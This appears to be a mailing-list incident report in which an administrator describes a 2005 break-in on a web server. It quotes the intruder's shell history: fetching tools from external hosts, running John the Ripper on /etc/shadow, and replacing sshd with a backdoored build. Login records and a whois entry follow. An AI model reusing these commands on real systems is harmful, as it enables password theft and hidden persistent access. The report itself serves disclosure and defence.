[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
SSH compiled with backdoor
One of my web servers was hacked on July 17, 2005. bash_history showed:
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
According to john, a couple of users had weak passwords, but root seemed well protected. From looking in all the bash_history, it appears the hacker came in from the website account, and did an su from there.
I found this about a month later when I logged into the box, did an ls, only to be met by a seg fault. A ps x showed mech.tgz trying to be downloaded, and a bunch of other CRON processes running. The auth log didn't show other logins, though, so the ssh installed must have logging turned off for the backdoor they installed.
I filled out an abuse form at geocities for the accounts hosting the software after downloading the software (I couldn't find the tgz files on my system).
reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15 (37+11:47)
website pts/0 188.8.131.52 Sun Jul 17 17:42 - down (00:27)
website pts/1 184.108.40.206 Sun Jul 17 17:05 - 17:26 (00:20)
website pts/0 220.127.116.11 Sun Jul 17 16:26 - 17:41 (01:14)
inetnum: 18.104.22.168 - 22.214.171.124
descr: Starnets - Datanet
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA